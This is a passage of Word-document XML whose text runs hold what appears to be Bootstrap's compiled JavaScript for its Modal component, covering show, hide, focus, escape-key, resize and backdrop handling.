        <w:t xml:space="preserve">    FIXED_CONTENT: '.fixed-top, .fixed-bottom, .is-fixed, .sticky-top',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    STICKY_CONTENT: '.sticky-top'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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Modal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Modal(element, config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._config = this._getConfig(config);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  this._dialog = element.querySelector(Selector$5.DIALOG);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._backdrop = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isShown = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isBodyOverflowing = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._ignoreBackdropClick = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isTransitioning = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._scrollbarWidth = 0;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Modal.prototype;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_proto.toggle = function toggle(relatedTarget) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return this._isShown ? this.hide() : this.show(relatedTarget);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_proto.show = function show(relatedTarget)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if (this._isShown || this._isTransitioning)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($(this._element).hasClass(ClassName$5.FADE)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._isTransitioning = true;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showEvent = $.Event(Event$5.SHOW, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        relatedTarget: relatedTarget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$(this._element).trigger(showEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._isShown || showEvent.isDefaultPrevented())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this._isShown = true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._checkScrollbar();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._setScrollbar();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._adjustDialog();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._setEscapeEvent();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._setResizeEvent();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._element).on(Event$5.CLICK_DISMISS, Selector$5.DATA_DISMISS, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return _this.hide(event);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$(this._dialog).on(Event$5.MOUSEDOWN_DISMISS, function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(_this._element).one(Event$5.MOUSEUP_DISMISS, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if ($(event.target).is(_this._element)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            _this._ignoreBackdropClick = true;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});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._showBackdrop(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return _this._showElement(relatedTarget);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_proto.hide = function hide(event)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if (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        event.preventDefault();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(!this._isShown || this._isTransitioning)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hideEvent = $.Event(Event$5.HIDE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._element).trigger(hideEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!this._isShown || hideEvent.isDefaultPrevented())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this._isShown = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var transition = $(this._element).hasClass(ClassName$5.FADE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      if (transition) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._isTransitioning = true;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this._setEscapeEvent();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._setResizeEvent();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(document).off(Event$5.FOCUSIN);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._element).removeClass(ClassName$5.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._element).off(Event$5.CLICK_DISMISS);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._dialog).off(Event$5.MOUSEDOWN_DISMISS);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (transition) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var transitionDuration = Util.getTransitionDurationFromElement(this._element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._element).one(Util.TRANSITION_END, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return _this2._hideModal(event);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        }).emulateTransitionEnd(transitionDuration);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this._hideModal();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[window, this._element, this._dialog].forEach(function (htmlElement) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return $(htmlElement).off(EVENT_KEY$5);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/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">       * `document` has 2 events `Event.FOCUSIN` and `Event.CLICK_DATA_API`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">       * Do not move `document` in `htmlElements` array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">       * It will remove `Event.CLICK_DATA_API` event that should remain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">       */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(document).off(Event$5.FOCUSIN);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $.removeData(this._element, DATA_KEY$5);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._config = null;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  this._dialog = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._backdrop = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isShown = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isBodyOverflowing = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._ignoreBackdropClick = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isTransitioning = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._scrollbarWidth = null;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_proto.handleUpdate = function handleUpdate() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._adjustDialog();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_proto._getConfig = function _getConfig(config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      config = _objectSpread({}, Default$3, config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      Util.typeCheckConfig(NAME$5, config, DefaultType$3);</w:t>
      </w:r>
    </w:p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_proto._showElement = function _showElement(relatedTarget) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this3 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var transition = $(this._element).hasClass(ClassName$5.FADE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!this._element.parentNode || this._element.parentNode.nodeType !== Node.ELEMENT_NODE) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // Don't move modal's DOM position</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        document.body.appendChild(this._element);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this._element.style.display = 'block';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element.removeAttribute('aria-hidden');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element.setAttribute('aria-modal', true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if ($(this._dialog).hasClass(ClassName$5.SCROLLABLE)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._dialog.querySelector(Selector$5.MODAL_BODY).scrollTop = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      } else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._element.scrollTop = 0;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(transition) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        Util.reflow(this._element);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$(this._element).addClass(ClassName$5.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._config.focus) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._enforceFocus();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shownEvent = $.Event(Event$5.SHOWN, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        relatedTarget: relatedTarget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var transitionComplete = function transitionComplete() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (_this3._config.focus) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this3._element.focus();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_this3._isTransitioning = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(_this3._element).trigger(shownEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (transition) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var transitionDuration = Util.getTransitionDurationFromElement(this._dialog);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._dialog).one(Util.TRANSITION_END, transitionComplete).emulateTransitionEnd(transitionDuration);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transitionComplete();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_proto._enforceFocus = function _enforceFocus() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this4 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(document).off(Event$5.FOCUSIN) // Guard against infinite focus loop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      .on(Event$5.FOCUSIN, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (document !== event.target &amp;&amp; _this4._element !== event.target &amp;&amp; $(_this4._element).has(event.target).length === 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this4._element.focus();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_proto._setEscapeEvent = function _setEscapeEvent() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this5 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      if (this._isShown &amp;&amp; this._config.keyboard) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._element).on(Event$5.KEYDOWN_DISMISS, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (event.which === ESCAPE_KEYCODE$1) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            event.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            _this5.hide();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 else if (!this._isShown) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._element).off(Event$5.KEYDOWN_DISMISS);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_proto._setResizeEvent = function _setResizeEvent() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this6 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._isShown) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(window).on(Event$5.RESIZE, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return _this6.handleUpdate(event);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$(window).off(Event$5.RESIZE);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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    _proto._hideModal = function _hideModal() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this7 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element.style.display = 'none';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element.setAttribute('aria-hidden', true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element.removeAttribute('aria-modal');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isTransitioning = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._showBackdrop(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(document.body).removeClass(ClassName$5.OPEN);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        _this7._resetAdjustments();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        _this7._resetScrollbar();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(_this7._element).trigger(Event$5.HIDDEN);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_proto._removeBackdrop = function _removeBackdrop() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._backdrop) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._backdrop).remove();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        this._backdrop = null;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_proto._showBackdrop = function _showBackdrop(callback) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this8 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var animate = $(this._element).hasClass(ClassName$5.FADE) ? ClassName$5.FADE : '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._isShown &amp;&amp; this._config.backdrop) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._backdrop = document.createElement('div');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._backdrop.className = ClassName$5.BACKDROP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (animate) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          this._backdrop.classList.add(animate);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$(this._backdrop).appendTo(document.body);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
